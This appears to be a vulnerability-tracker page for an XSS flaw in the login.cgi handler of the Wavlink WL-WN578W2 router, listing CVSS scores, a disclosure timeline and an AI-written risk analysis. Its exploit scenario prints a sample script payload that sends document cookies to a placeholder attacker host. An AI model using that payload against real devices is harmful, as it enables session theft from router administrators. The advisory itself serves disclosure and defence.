Skip to main content

Wl Wn578w2 EUVD-2026-14297

| CVE-2026-4544 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-03-22 VulDB GHSA-jg8g-rwpf-2m3j
XSS Wl Wn578w2
1.9
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
1.9 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
P
Scope
X

Lifecycle Timeline

5
CVSS changed
Apr 29, 2026 - 01:11 NVD
2.4 (LOW) 1.9 (LOW)
PoC Detected
Mar 23, 2026 - 14:31 vuln.today
Public exploit code
EUVD ID Assigned
Mar 22, 2026 - 10:15 euvd
EUVD-2026-14297
Analysis Generated
Mar 22, 2026 - 10:15 vuln.today
CVE Published
Mar 22, 2026 - 09:58 nvd
LOW 2.4

DescriptionCVE.org

A vulnerability was determined in Wavlink WL-WN578W2 221110. This affects an unknown function of the file /cgi-bin/login.cgi of the component POST Request Handler. Executing a manipulation of the argument homepage/hostname/login_page can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

A Stored/Reflected Cross-Site Scripting (XSS) vulnerability exists in the Wavlink WL-WN578W2 wireless router (firmware version 221110 and potentially others) within the POST request handler of /cgi-bin/login.cgi. An attacker with high privileges can manipulate the homepage, hostname, or login_page parameters to inject malicious JavaScript that executes in the context of other users' browsers. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment Despite the low CVSS score of 2.4, this vulnerability carries moderate real-world risk when contextual factors are considered. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with admin credentials (or who has compromised an admin account via phishing) crafts a POST request to /cgi-bin/login.cgi with a malicious payload in the homepage or login_page parameter, such as homepage=<script>fetch('https://attacker.com/steal?cookies='+document.cookie)</script>. If a second admin user later accesses the router's web interface, the injected script executes in their browser, exfiltrating session cookies or authentication tokens. …
Remediation No official patch is available from Wavlink at this time due to the vendor's lack of response to disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

During next maintenance window: Apply vendor patches when convenient. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-14297 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy